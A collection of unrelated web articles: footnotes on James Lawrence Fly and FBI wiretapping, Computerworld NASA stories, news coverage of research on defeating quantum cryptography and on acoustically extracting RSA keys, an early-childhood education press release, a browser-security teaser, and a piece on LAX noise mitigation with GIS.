sess., 1943-1944, part 3, 2600, 26667-68. 27 A.H. Belmont to L.V. Boardman, “Memorandum Concerning James Lawrence Fly,” 3 November 1955, Fly File, 11. 28 U.S. Congress, Joint Committee on the Investigation of the Pearl Harbor Attack, Pearl Harbor Attack, “Report of Army Pearl Harbor Board,” 79th Cong., 1st. sess., 1946, vol. 39, 277. 29 Belmont to Boardman, 11. 30 George Elsey to President Truman, memorandum, 2 February 1950, in Athan G. Theoharis, The Truman Presidency: The Origins of the Imperial Presidency and the National Security State (Stanfordville, N.Y., 1979), 293-94; Sally Fly Connell, typewritten notes for a biography of James lawrence Fly, Fly Papers. 31 “James Lawrence Fly, 1898-1966,” obituary, Civil Liberties, March 1966 unpaged clipping Fly Papers. 32 Robert J. Lamphere and Tom Shachtman, The FBI-KGB War: A Special Agent’s Story (New York, 1986), 96-125; United States v. Coplon, 185 F. (2d) 629 (2 Cir 1950); Coplon V. United States, 191 F. (2d) 749 (D.C. Cir 1951; Robert K. Welch, “FBI Seizes U.S. Clark and Russian as Spies [Washington] Evening Star, 5 March 1949, sec. A, p.1; “Baby Face,” Time, 14 March 1949, 28; “It was Love,” Time, 27 June 1949, 19; Bill Brinkley, “Miss Coplon Admits Sharing Hotel Rooms with Federal Lawyer,” Washington Post, 22 June 1949, sec, A, p.1. 33 “Wiretap Genesis Inputed to Dewey,” New York Times, 29 March 1949, p.19. 34 Ladd to the Director, memorandum, 28 August 1951, Fly File, 14. 35 James Lawrence Fly, Petition of New York County Criminal Courts Bar Association to the Honorable The Attorney General of the United States, June 1949, Fly Papers. 36 Lamphere and Shactman, 108-10; Joseph Paull, “Coplon Appeal is Taken Under Advisement After Judge Questions Wire-Tap Evidence,” Washington Post, 1 December 1950, sec. B, p.4. 37 Bill Brinkley, “Russia Got Atom Equipment, Court Told; FBI Bares Secrets Rather Than Drop Coplon Case,” Washington Post, 8 June 1949, sec. A, p.1; Lamphere and Shactman, 114-15. 38 Bill Brinkley, ‘Names of Film Stars Figure in FBI Papers Read to Coplon Jurors,” Washington Post, 9 June 1949, sec. A, p. 1; “FBI Agent Says Coplon Wire Not Tapped at Beginning,” Washington Post, 11 January 1950, sec. A, p.2; United States v. Coplon, 185 F. 2d 639 (2nd Cir 1950); Edward K. Nellor, “FBI Memo Lists Top D.C. Reds,” [Washington] Times Herald, 10 June 1949, p.1; James Lawrence Fly, Untitled Notes for an Autobiography (c. 1950), handwritten, Fly Collection, 5. 39 “What the FBI Heard,” Time, 9 January 1950, 12; Carles Grutzner, “Judge Presses U.S. On Coplon records,” New York Times, 6 January 1950, p. 6; James Lawrence Fly, Counsel to American Civil Liberties Union, Amicus Curiae Brief for U.S. District Court, District of Columbia, United States of America v. Judith Coplon, Fly Papers, 2. 40 James Lawrence Fly, “FBI’s Wiretap Activities,” New York Times, 17 January 1950, p. 26. 41 Unsigned and undated petition asking for investigation of the FBI, Fly File and Fly Papers; L.B. Nichols to Mr. Tolson, memorandum, 17 February 1950, Fly File; Walter Trohan, “Fly, Foe of FBI, called Shield for Disloyalty,” Chicago Tribune, 9 February 1950, part 2, p.1; L.B. Nichols to Mr. Tolson, memoranda, 9 May 1950, 12 May 1950, 6 July 1950, Fly File. 42 United States v. Coplon, 185 F. 2d 629, 635, 637, 640 (2d Cir 1950). 43 Coplon v. United States, 191 F. 2d 749 (D.C. Cir 1951); Sidney E. Zion, “U.S. Drops Charges in Coplon Spy Case,” New York Times, 7 January 1967, p.1. 44 James Lawrence Fly, “Threat to Liberty, Defiance of Law See in FBI Wire-Tapping,” Washington Post, 7 January 1950, sec. A, p. 9. 45 FBI Wiretapping to Continue, McGrath Says After Interview,” Washington Post, 9 January 1950, sec. A, p. 1; Chalmers M. Roberts, “Anit-Tygoon Conference Here Lauded,” Washington Post, 9 January 950, sec. A, . 1; “Dirty Business,” Washington Post, 11 January 1950, sec. A, p. 10. 46 Fly, Notes for autobiography, 24-25. 47 “Harry’s Day in Court,” Time, 27 February 1950, 23; D. M. Ladd to the Director, memorandum, 28 November 1949, Fly File; U.S. House, Deliberation on bill that would deport certain aliens, H.R. 5138, 76th Cong. 3d sess., Congressional Record (22 June 1940) 86 pt. 8:9031-36; James Lawrence Fly to Messrs. Hays and Fraenkel memorandum RE: United States v. Harry Bridges, 10 October 1949, Fly Papers. 48 William Fitts, interview with Sally Fly Connell, 14 August 1967, Oral History Collection, Columbia University, New York City, 38-39. 49 Lawrence E. Davies, “Court Room Fight for Bridges Opens,” New York Times, 5 October 1949, p. 26; Luther A. Huston, “Supreme Court Frees Bridges Under Statue of Limitations,” New York Times, 16 June 1953, p. 1; Edward Brecher, interview by Sally Fly Connell, 11 September 1967, Oral History Collection, Columbia University, 34; James Lawrence Fly to President Harry Truman, RE: Charge by TVA Loyalty Board 19 July 1951, Fly Papers; “Fly Assails Effort “to Destroy My Character,” Miami Herald, 8 March 1954, sec. A, p. 18. 50 James Lawrence Fly, “The Case Against Wire Tapping,” Look, 27 September 1949, 35 et seq; James Lawrence Fly, “The Wire-Tapping Outrage,” New Republic, 6 February 1950, 14-15. 51 James Lawrence Fly, Petition to the Federal Communications Commission re: Wiretapping, February 1950, Fly papers; James Lawrence Fly, “Fly Scores Legal profession For Its Apathy Toward F.B.I. Wire Tapping,” Harvard Law School Record, 26 April 1950, 4. 52 James Lawrence Fly, “A Wholesome Thing,” Saturday Review of Literature, 23 December 1950, 15. 53 James Lawrence Fly, “Halo for Mr. Hoover?” Saturday Review of Literature, 29 December 1956,11-12. 54 U.S. Senate, Subcommittee of the Committee on the Judiciary, Wiretapping for National Security: Hearings on S. 832, S. 2753, S. 3229, H.R. 8649, 83rd Cong., 2d sess., 1954, 230, 250, 15, 118; U.S. House, Subcommittee no. 3, Committee on the Judiciary, Wiretapping for National Security: Hearings on H.R. 408, H.R. 477, H.R. 3552, H.R. 5149, 83rd Cong., 1st sess., 1953, 4, 86. 55 Ibid., 1-5. 56 McGrath to Emanuel Celler, 2 February 1951, in US. House, Wiretapping for National Security, 20; Hoover to McGrath, “Personal and Confidential Memo,” 6 October 1951, in From the Secret Files of J. Edgar Hoover, 136. 57 U.S. House, Wiretapping for National Security, passim, 36, 56, 75. 58 Ibid., 66. 59 Ibid., 78-79, 83. 60 C.P. Trussell, “Wiretapping Bill Is Voted By House,” New York Times, 9 April 1954, p. 1. 61 Edward R. Murrow, See It Now, television program on CBS network, 1 December 1953, videotape copy at Museum of Television and Radio, New York City. 62 Jones to Nichols, memorandum, 2 December 1953, Fly File, 3. 63 Fly to Keating, 4 December 1953, Fly Papers. 64 American Civil Liberties Union, “Statement on Wiretapping,” April 1951, Fly Papers. 65 Fly to Keating, 2. 66 Fly to President Truman, 19 July 1951, Fly Papers. 67 Who’s Who in America, 49th ed. (New Providence, N.J., 1995), 3620. 68 “Seeds Post Asks FCC to Probe James Fly,” Miami Herald, 7 March 1954, sec. A, p. 18; Fly to O’Brian, 16 March 1954, Fly Papers. 69 U.S. Senate, Wiretapping for National Security, 191, 196. 70 Ibid., 189; James Lawrence Fly, “Mr. Fly on Wire Tapping: Former FCC Member Expounds His Views of ‘Dirty Business’ In Reply to Star Editorial,” [Washington] Evening Star, 13 June 1949, sec. A, p. 10. 71 United States Code Annotated, title 18, sec. 2517 (St. Paul, 1998), 229. 72 U.S. Senate, Wiretapping for National Security, 192. 73 C.P. Trussell, “Senators Tie Up Wiretapping Bill,” New York Times, 10 August 1954, p. 11; “Wire-Tap Approval Sought,” New York Times, 18 November 1954, p. 17. 74 William F. Brown and Americo R. Cinquegrana, “Warrantless Physical Searches for Foreign Intelligence Purposes: Executive Order 12,333 and the Fourth Amendment,” Catholic University Law Review 35 (1985): 97-128; United States Code Annotated, chapter 36, title 50, secs. 1801-11, chapter 119, title 18, secs. 2510-22 (St. Paul, 1998). 75 Sally Fly Connell, Notes for a biography of James Lawrence Fly, Fly Papers; “Stern Decision on Ch. 7 Miami,” Broadcasting, 19 September 1960, 71. 76 Jane Eads, “Fly of Texas Thinks Life Would be Dull Without Weekly Lashings,” Houston Post, 12 December 1943, Sunday magazine, p. 2. 77 Fly, Notes for autobiography, c, 1. More information about James Lawrence Fly: — THANK YOU!
<urn:uuid:1b4465c7-eb24-40f6-ac38-b25921f5d59e>
CC-MAIN-2017-09
http://counterespionage.com/1940s-50s-james-lawrence-fly-wiretap-warrior.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170434.7/warc/CC-MAIN-20170219104610-00184-ip-10-171-10-108.ec2.internal.warc.gz
en
0.957812
12,852
3
3
Robotic spheres aboard the International Space Station soon will will be quite a bit smarter, using Google technology to fly safely and adroitly around the orbiter. NASA's Ames Research Center is teaming up with Google's Project Tango team to add the company's new 3D technology to the tech tools aboard the Orbital Sciences Corp.'s Cygnus cargo spacecraft. Cygnus is scheduled to lift off for a journey to the space station at 12:52 p.m. EDT on Sunday, July 13 filled with about 3,300 pounds of supplies. The launch ws postponed from last Saturday due to severe weather. Along with the Project Tango equipment, Cygnus will deliver food for the astronauts living on the station, spare parts for scientific experiments and extra hardware. Google's technology comes out of Project Tango, an effort to create 3D-enabled tablets and smartphones. The astronauts will integrate the Google tech with a robotic platform that will work inside the space station. Smart SPHERES is a prototype free-flying space robot based on NASA's Synchronized Position Hold, Engage, Reorient Experimental Satellites. NASA has been testing SPHERES on the space station since 2011. Chris Provencher, Smart Spheres project manager at NASA contractor SGT, said the astronauts will upgrade the robots to use Google's Tango 3D smartphone, which uses a custom 3D sensor and multiple cameras. Starting in early August, the astronauts will turn on the sensors that enable the 3D navigation and take the SPHERES throughout the station, mapping its entire layout. About a month later, NASA should know if the map is accurate. At that point, they'll upload it to the floating robots and they can begin using that map to navigate throughout the space station. "It'll be a big advance," said Provencher. "The robots have been restrained to flying in a small 2-foot by 2-foot by 2-foot area. One hurdle we still need to get over is to fly that robot anywhere in the space station and this should do that." NASA has been looking to use small flying robots to perform tasks on the space station. For instance, Provencher said the SPHERES could use a camera to give flight controllers in Houston views of the entire inside of the station for situational awareness. The flying robots also will carry air quality and noise sensors. "These are all tasks the crew does for themselves right now," said Provencher. "We're trying to offload crew tasks to give them more time for science instead of housekeeping." The SPHERES robots now on the space station are prototypes. If the 3D mapping navigation capability works as hoped, it will be part of the production version of the devices. "There would have to be some kind of design changes to make it fully autonomous," said Provencher. "Right now, the SPHERE is used for testing, not tasks. The idea is to let the free-flying robot have purpose and be useful by letting it freely roam throughout the space station." Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at Twitter @sgaudin, on Google+ or subscribe to Sharon's RSS feed. Her email address is firstname.lastname@example.org.
<urn:uuid:007c8f22-d56a-48d3-93d6-3767e47033d3>
CC-MAIN-2017-09
http://www.computerworld.com/article/2489895/emerging-technology/nasa-to-use-google-s-project-tango-to-update-space-robot.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170708.51/warc/CC-MAIN-20170219104610-00360-ip-10-171-10-108.ec2.internal.warc.gz
en
0.929039
699
2.828125
3
NASA's super rover Curiosity has collected a sample from the inside of a rock on Mars, the first time the process has been done on another planet, NASA announced Wednesday. The robotic rover sent images back to NASA scientists showing the drilling and an image of the powdered-rock sample in the rover's scoop. "Seeing the powder from the drill in the scoop allows us to verify for the first time the drill collected a sample as it bore into the rock," said Scott McCloskey, NASA's drill systems engineer for Curiosity. "Many of us have been working toward this day for years, he said. Getting final confirmation of successful drilling is incredibly gratifying. For the sampling team, this is the equivalent of the landing team going crazy after the successful touchdown." The rover is about six months into a two-year mission to help scientists figure out if Mars has, or has ever had, an environment that could support life, even life in a microbial form. The rover, which carries 17 cameras and 10 scientific instruments, has already found evidence of a thousand-year water flow on Mars. The finding came in the form of an outcropping of rocks that appeared to have been heaved up by a vigorous water flow. Curiosity's two Martian predecessors - the rovers Spirit and Opportunity - are not equipped for drilling. NASA scientists have been eager to drill so they can analyze Martian rocks for information about its mineral and chemical composition. Curiosity's robotic arm bored a 2.5-inch hole into the rock on Feb. 8, taking in the powder the drilling created. After going through an onboard sieve, the powder will be delivered to Curiosity's analysis instruments. The rock that was drilled sits on a section of flat bedrock. NASA has dubbed the rock "John Klein," in memory of a Mars Science Laboratory deputy project manager who died in 2011. Scientists chose the rock for the rover's first drill because they think it may hold evidence of an ancient wet environment. NASA hopes the rock's composition may give them clues to its history. Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, or subscribe to Sharon's RSS feed . Her e-mail address is firstname.lastname@example.org.
<urn:uuid:d213d88b-12fe-42c0-94cb-55b648119149>
CC-MAIN-2017-09
http://www.computerworld.com/article/2495308/emerging-technology/nasa-rover-curiosity-grabs-first-martian-rock-sample.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171251.27/warc/CC-MAIN-20170219104611-00408-ip-10-171-10-108.ec2.internal.warc.gz
en
0.947957
480
3.421875
3
Quantum cryptography has been pushed onto the market as a way to provide absolute security for communications. It is already used in Swiss elections to ensure that electronic vote data is securely transmitted to central locations. And as far as we know, no current quantum cryptographic system has been compromised in the field. This may be due to the work of security researchers who spend all their waking moments—and quite a lot of their non-waking moments—trying to pick the lock on quantum systems. Their general approach can be summed up as follows: if you can fool a detector into thinking a classical light pulse is actually a quantum light pulse, then you might just be able to defeat a quantum cryptographic system. But even then the attack should fail, because quantum entangled states have statistics that cannot be achieved with classical light sources—by comparing statistics, you could unmask the deception. In the latest of a series of papers devoted to this topic, a group of researchers has now shown that the statistics can also be faked. Quantum cryptography relies on the concept of entanglement. With entanglement, some statistical correlations are measured to be larger than those found in experiments based purely on classical physics. Cryptographic security works by using the correlations between entangled photons pairs to generate a common secret key. If an eavesdropper intercepts the quantum part of the signal, the statistics change, revealing the presence of an interloper. But there's a catch here. I can make a classical signal that is perfectly correlated to any signal at all, provided I have time to measure said signal and replicate it appropriately. In other words, these statistical arguments only apply when there is no causal connection between the two measurements. You might think that this makes intercepting the quantum goodness of a cryptographic system easy. But you would be wrong. When Eve intercepts the photons from the transmitting station run by Alice, she also destroys the photons. And even though she gets a result from her measurement, she cannot know the photons' full state. Thus, she cannot recreate, at the single photon level, a state that will ensure that Bob, at the receiving station, will observe identical measurements. That is the theory anyway. But this is where the second loophole comes into play. We often assume that the detectors are actually detecting what we think they are detecting. In practice, there is no such thing as a single photon, single polarization detector. Instead, what we use is a filter that only allows a particular polarization of light to pass and an intensity detector to look for light. The filter doesn't care how many photons pass through, while the detector plays lots of games to try and be single photon sensitive when, ultimately, it is not. It's this gap between theory and practice that allows a carefully manipulated classical light beam to fool a detector into reporting single photon clicks. Since Eve has measured the polarization state of the photon, she knows what polarization state to set on her classical light pulse in order to fake Bob into recording the same measurement result. When Bob and Alice compare notes, they get the right answers and assume everything is on the up and up. The researchers demonstrated that this attack succeeds with standard (but not commercial) quantum cryptography equipment under a range of different circumstances. In fact, they could make the setup outperform the quantum implementation for some particular settings. The researchers also claim that this attack will be very difficult to detect, but I disagree. The attack depends on very carefully setting the power in the light beams so that only a single photodetector is triggered in Bob's apparatus. Within the detector, the light beam gets divided into two and then passed through polarization filters and detected. For a single photon beam, this doesn't matter—only one detector can click at any one time. But Eve's bright bunch of photons could set multiple detectors clicking at the same time. If you periodically remove filters, then Eve will inadvertently trigger more than a single photodiode, revealing her presence. Physical Review Letters, 2011, DOI: 10.1103/PhysRevLett.107.170404
<urn:uuid:aba21ba5-e76f-40db-a3b1-8a4c4465e272>
CC-MAIN-2017-09
https://arstechnica.com/science/2011/11/researchers-show-how-to-break-quantum-cryptography-by-faking-quantum-entanglement/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174163.72/warc/CC-MAIN-20170219104614-00460-ip-10-171-10-108.ec2.internal.warc.gz
en
0.951349
827
2.9375
3
WASHINGTON, DC--(Marketwired - March 31, 2014) - The National Association for the Education of Young Children's (NAEYC) Week of the Young Child™ (April 6-12, 2014) draws attention to how a high-quality early childhood experience the first few years of life set a child's path for success in school and in life and offers tips for parents to be sure they're choosing high-quality program. "Week of the Young Child™ reinforces that the early years (birth through age 8) are critical learning years, and qualified early childhood professionals accelerate how our children learn, develop, build the skills to get along with others, and succeed in school and life," said Rhian Evans Allvin, NAEYC's Executive Director. "An NAEYC accredited program offers a safe, nurturing, and stimulating environment during the early years with specially skilled and knowledgeable staff and professionals can ensure children have the most positive learning experience possible." NAEYC offers the following tips parents can use when selecting a safe, nurturing and stimulating learning environment for their children. For infants, a high-quality program means: - Group size is limited to no more than eight babies, with at least one teacher for every three children. - Each infant is assigned to a primary caregiver, allowing for strong bonds to form and so each teacher can get to know a few babies and families very well. - Teachers show warmth and support to infants throughout the day; they make eye contact and talk to them about what is going on. - Teachers are alert to babies' cues; they hold infants or move them to a new place or position, giving babies variety in what they can look at and do. - Teachers pay close attention and talk and sing with children during routines such as diapering, feeding, and dressing. - Teachers follow standards for health and safety, including proper hand washing to limit the spread of infectious disease. - Teachers can see and hear infants at all times. - Teachers welcome parents to drop by the home or center at any time. For toddlers, a high-quality program means: - Children remain with a primary teacher over time so they can form strong relationships. - The teacher learns to respond to the toddler's individual temperament, needs, and cues, and builds a strong relationship communication with the child's family. - Teachers recognize that toddlers are not yet able to communicate all of their needs through language; they promptly respond to children's cries or other signs of distress. - Teachers set good examples for children by treating others with kindness and respect; they encourage toddlers' language skills so children can express their wants and needs with words. - The physical space and activities allow all children to participate. For example, a child with a physical disability eats at the same table as other children. - Teachers frequently read to toddlers, sing to toddlers (in English and children's home languages), do finger-plays, and act out simple stories as children actively participate. - Teachers engage toddlers in everyday routines such as eating, toileting, and dressing so children can learn new skills and better control their own behavior. - Children have many opportunities for safe, active, large-muscle play both indoors and outdoors. - Parents are always welcome in the home or center. - Teachers have training in child development or early education specific to the toddler age group. For preschoolers ages 3 to 5, a high-quality program means: - Children follow their own individual developmental patterns, which may vary greatly from child to child. - Children feel safe and secure in their environment. - Children have activities and materials that offer just enough challenge -- they are neither so easy that they are boring nor so difficult that they lead to frustration. - Children can connect what they learn with past experiences and current interests. - Children have opportunities to explore and play. To find a NAEYC accredited center or school and for more tips for choosing a high-quality early childhood education program go to http://families.naeyc.org NAEYC's mission is to serve and act on behalf of the needs, rights and well-being of all young children with primary focus on the provision of educational and developmental services and resources. Founded in 1926, the National Association for the Education of Young Children is the largest and most influential advocate for high-quality early care and education in the United States. Learn more at www.naeyc.org.
<urn:uuid:c29aaca9-519d-418f-a497-d9969028ce31>
CC-MAIN-2017-09
http://www.marketwired.com/press-release/essential-ingredients-high-quality-early-childhood-education-highlighted-week-young-1894257.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171053.19/warc/CC-MAIN-20170219104611-00581-ip-10-171-10-108.ec2.internal.warc.gz
en
0.952863
919
2.9375
3
Regular browsers, such as the one that came with your PC or mobile device, are leaking data on the internet like a sieve. The inherent vulnerabilities of the local browser model allow criminal hackers to infiltrate computers and steal or manipulate data. Firewalls or antivirus software provide little or no protection against modern attackers and their tools. Browser add-ons, plugins and extensions promising “extra” security and privacy cannot be trusted. Their makers were even caught selling out private user data. Because the “traditional” browser architecture is inherently unsafe and promoting data leakage, a new generation of secure browsers has been developed for security-conscious companies and consumers. Not all supposedly “secure” browsers are equal, and some are not secure at all. How can you tell the difference? In this second part of “8 Must-Have Features of a Secure Browser” (read Part 1 here), we examine another four features and capabilities your browser must have to deserve the label “secure” for business or personal use.
<urn:uuid:bf74024f-373c-4209-85be-36c2a4cca1ab>
CC-MAIN-2017-09
https://go.authentic8.com/blog
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00281-ip-10-171-10-108.ec2.internal.warc.gz
en
0.921115
213
2.75
3
It sounds too preposterous for even James Bond: by placing a mobile phone next to a PC, researchers can "listen" to the faintest sound a CPU makes as it churns away on RSA-encoded content and extract the keys themselves. Preposterous, except for the fact that Adi Shamir, one of the co-developers of the RSA encryption algorithm, co-wrote the paper that describes how to do it. Daniel Genkin and Eran Tromer were the other two authors. "The attack can extract full 4096-bit RSA decryption keys from laptop computers (of various models), within an hour, using the sound generated by the computer during the decryption of some chosen ciphertexts," the paper's authors wrote. "We experimentally demonstrate that such attacks can be carried out, using either a plain mobile phone placed next to the computer, or a more sensitive microphone placed 4 meters away." The authors were able to experimentally succeed with their method using either an ungainly, and extremely obvious, parabolic antenna from 4 meters away, or by using a generic mobile phone from just 30 centimeters away. A Naturally, better listening equipment decreased the time to extract the RSA keys. And it gets even worse: merelyA touching the PC also allowed an attacker to extract the keys by measuring the electric potential of the PC chassis. In this case, users who touched the PC (and surreptitiously measured their electric potential) should be able to extract the keys. And be persuading the victim to plug in either anA innocuous-looking VGA or ethernet cable into his laptop, the attacker could measure the shield potential elsewhere and get the keys as well. Typically, simply having physical access to a unsuspecting PC is enough for some security experts to throw up their hands and concede that the attacker has won. And that's true, in this case, as well.A But the paper's authors demonstrated an "attack" running in a lecture hall, and suggested other plausible scenarios: " Install an attack app on your phone. Set up a meeting with your victim, and during the meeting, place your phone on the desk next to the the victim's laptop. " Break into your victim's phone, install your attack app, and wait until the victim inadvertently places his phone next to the target laptop. " Construct a webpage, and use the microphone of the computer running the browser using Flash or another method. When the user permits the microphone access, use it to steal the user's secret key. " Put your stash of eavesdropping bugs and laser microphones to a new use. " Send your server to a colocation facility, with a good microphone inside the box. Then acoustically extract keys from all nearby servers. " Get near a protected machine, place a microphone next to its ventilation holes, and extract the secrets. The techniques the authors describe can be countered by sound dampening, but the white noise of a PC's fan can be pretty easily filtered out. The researchers said that they supplied their attack vector to GnuPG developers before publication, let them develop revised code, and yet it was still vulnerable. The answer may lie in using software to try and obfuscate the audible sound emanations, they said. In any case, the paper that Genkin, Shamir, and Tromer authored is seriously scary stuff, especially for business or government travelers carrying sensitive information outside the country as well as into and through strange hotels and conference rooms. This story, "RSA Keys Snatched By Recording CPU Sounds with a Phone" was originally published by PCWorld.
<urn:uuid:6061070d-83b4-4b22-84dc-3acdb5b84064>
CC-MAIN-2017-09
http://www.cio.com/article/2380043/security0/rsa-keys-snatched-by-recording-cpu-sounds-with-a-phone.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172831.37/warc/CC-MAIN-20170219104612-00633-ip-10-171-10-108.ec2.internal.warc.gz
en
0.949783
744
2.859375
3
With the coming of age of civil aviation in the 1930s and 1940s, the rural settings of many U.S. airports began to change. By the 1950s, expanding metropolitan centers surrounded formerly remote airfields with residential and commercial developments. As more powerful airliners rolled off the drawing boards, noise became an issue for those living nearby. With the arrival of commercial jets in the late '50s, neighborhoods under the flight paths of major airports became almost unlivable. Mounting complaints, declining property values and class-action lawsuits by residents and cities prompted the aviation industry and state and federal governments to find solutions to the problem. California passed Title 21 and Title 24, mandating that airports and local governments provide mitigation measures. By 1979, Federal Aviation Regulations Part 150 enabled airports and local jurisdictions to apply for funding to either sound-insulate affected homes or acquire them and relocate their owners. In the 1960s and 1970s, the Los Angeles Department of Airports -- now Los Angeles World Airports (LAWA) -- removed 2,800 homes and relocated 7,000 residents from around Los Angeles International Airport (LAX). Airport Noise Mitigation Program In compliance with California regulations, the LAWA Noise Management Bureau (NMB) recently completed plans for an Airport Noise Mitigation Program (ANMP) to sound-insulate approximately 25,000 residences surrounding LAX. The construction phase of the program, begun in 1996, will be completed in the next five to seven years, at a cost of more than $200 million. Funding for the LAWA program is generated from "passenger facility charges," a $3 surcharge on departing passengers, authorized by the Federal Aviation Administration. Jurisdictions in the program areas can use LAWA funds and/or FAA grants to underwrite sound-insulation work in their respective areas. At present, ANMP applies only to residences. In the future, schools, churches, hospitals and other sensitive land uses may be added to the program. To determine which land uses (number and type of parcels) qualified for sound-insulation, LAWA set up a sophisticated network of noise-monitoring stations in jurisdictions surrounding LAX. Data from the network is loaded into an ArcInfo GIS running a program that models noise contours at the 65, 70, and 75 decibel (dB) levels. The contours are overlaid on a parcel-level basemap. Detailed information on parcels within the contours is then obtained from the related database, also used to phase qualifying residences into the sound-insulation schedule. NMB Environmental Supervisor Mark Adams pointed out that contours also help define costs. "For example, we know that a single-family home at the 75dB contour is going to cost more to insulate than one at 65dB. To estimate the total cost of the project and compute a construction schedule, we need a fairly accurate estimate of the number and type of homes at these noise levels. The contours help us to access that information." Data, tables, maps and information on all ANMP phases were required to be submitted in a lengthy annual report to the California Department of Transportation's Division of Aeronautics. Preparation and publication of the documents required a month or more. Wyle Laboratories, acoustical engineers and prime contractor for the program, was responsible for coordinating development of the initial report. Psomas and Associates, civil engineers with GIS expertise, had the task of updating and expanding a parcel-level database, and developing tools to speed up preparation of ANMP reports. According to Psomas Vice President Matt Rowe, the Santa Monica, Calif.-based firm began with a parcel-level database developed and maintained by NMB since the early 1980s. Although originally intended for a different project, the database covered much of the LAWA noise-mitigation planning area. An updated and expanded version, Rowe explained, could be used not only for spatial data management and noise analysis but also for monitoring the sound-insulation phase of the program. "Obviously, LAWA is not going to insulate and/or acquire 25,000 properties all at once," he said. "They will use the database to phase in that part of the program, beginning with the most heavily impacted areas close to the airport, and work their way out." Using ArcView and AutoCAD, Psomas expanded the original database to encompass additional areas in the five jurisdictions surrounding LAX. The process included updating general community plans and incorporating changes in jurisdictions, zoning and housing. The firm also populated the database with local-use codes, parcel numbers, TRW information, census data from TIGER line files and Thomas Brothers street maps. General community plans were then overlaid on the basemaps, and the noise contours placed over these. With ArcView AVENUE and a previous ANMP report as a template, Psomas programmers developed a structured query language that automated many of the complex steps involved in querying the database, and in identifying and quantifying spatial relationships. Wyle used the data and GIS application provided by Psomas to identify parcels within the contours; develop tables, reports and maps for noise mitigation plans; and calculate cost estimates and construction schedules -- all required for the annual report. Since neither Wyle nor NMB is a high-end GIS developer, the application enabled them to produce the ANMP report in considerably less time than with earlier methods. "What used to take a month," said Psomas Project Manager Matt Caraway, "now takes three to four days." "By automating much of the report," Adams added, "Psomas enabled all our GIS users to produce a relatively sophisticated product regardless of their skill levels." Projected Superjets Noise Psomas is also assisting LAX master planners Landrum and Brown in analyzing the projected noise from 550-passenger superjets now on the drawing boards. Airliners of the 21st century will have larger, more powerful engines and will need runways of two miles and longer. At this point, however, runway configurations for LAX are in the study phase. Final approval depends on the Los Angeles City Council and numerous federal and state regulatory agencies. Psomas' role in the project is similar to its work with the ANMP; the firm provides the database, and overlays the projected noise contours from Landrum and Brown onto the updated basemaps. Planners use the data to calculate the probable noise impact on surrounding communities. GIS enabled LAWA not only to expedite the complex process of documenting the airport noise mitigation program, but, as Adams pointed out, it also enabled them "to get a better handle on the scope of the program," particularly in identifying and scheduling residences for sound-insulation construction. The technology is currently helping LAX airport planners estimate with greater accuracy some of the environmental costs of accommodating the next generation of superjets. Bill McGarigle is a writer specializing in communication and information technology. October Table of Contents
<urn:uuid:48d03085-d204-47e3-91e6-a1657c71df5e>
CC-MAIN-2017-09
http://www.govtech.com/magazines/gt/Airport-Soundbytes.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172831.37/warc/CC-MAIN-20170219104612-00633-ip-10-171-10-108.ec2.internal.warc.gz
en
0.929275
1,439
3.09375
3
NASA's proposed $17.7 billion budget includes plans to capture and redirect an asteroid into orbit around Earth so astronauts can study it. Ultimately, the project looks to learn more about the makeup of asteroids in an attempt to protect the Earth from devastating collisions. "Today, we unveil President Obama's Fiscal Year 2014 budget ( PDF version ) request for NASA -- a $17.7 billion investment in our nation's future," said NASA Administrator Charles Bolden said today. "Our budget ensures the United States will remain the world's leader in space exploration and scientific discovery for years to come, while making critical advances in aerospace and aeronautics to benefit the American people." The plan may get more attention, and possibly more congressional approval, because of an asteroid that entered Earth's atmosphere on Feb. 15, creating a fireball that streaked across the sky, releasing a high burst of energy and showering an area around Chelyabinsk, Russia, with meteorites. The budget, which is flat compared to recent years, also includes funding to keep NASA on track to launch astronauts into space from U.S. soil by 2017. The budget also fully funds the building of a heavy-lift rocket and the Orion Multi-Purpose Crew Vehicle to carry astronauts into deep space. Orion is scheduled for an unmanned test flight in 2014, and a test of the rocket in 2017. NASA noted that any reduction to the proposed level of funding for the Commercial Crew program would result in a delay in launching Americans from U.S. borders, and would force the space agency to continue paying million of dollars to the Russians to carry NASA astronauts into space. NASA's 2014 budget proposal also includes continued funding for the International Space Station, and the continued operation of rovers and orbiters working on Mars, as well as planned future missions, such as a scheduled 2016 mission, called Insight, to examine why the Red Planet evolved so differently from Earth. NASA also is funding its continued work on the James Webb Space Telescope, which the space agency calls the next great observatory. With a planned launch in 2018, the telescope is geared to be the successor to the Hubble Space Telescope, searching for the first galaxies that formed in the early universe and hopefully giving scientists information about the Big Bang and the Milky Way. However, the plans to capture an asteroid and move it into Earth's orbit may be one of NASA's more attention-grabbing missions. The plan includes finding a near-Earth asteroid that weighs about 500 tons but may be only 25 or 30 feet long. NASA did not say how soon this could be done, but said it would keep the agency within reach of its goal to visit an asteroid by 2025. "This mission represents an unprecedented technological feat that will lead to new scientific discoveries and technological capabilities and help protect our home planet," Bolden said. "We will use existing capabilities, such as the Orion crew capsule and Space Launch System rocket, and develop new technologies like solar electric propulsion and laser communications -- all critical components of deep space exploration." He also said NASA's plans, including the asteroid mission, rocket and robotic development, will help to create jobs for the next generation of scientists and engineers. "NASA's ground-breaking science missions are reaching farther into our solar system, revealing unknown aspects of our universe and providing critical data about our home planet and threats to it," Bolden said. "Spacecraft are speeding to Jupiter, Pluto and Ceres while satellites peer into other galaxies, spot planets around other stars, and uncover the origins of the universe." Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed. Her email address is firstname.lastname@example.org. Read more about emerging 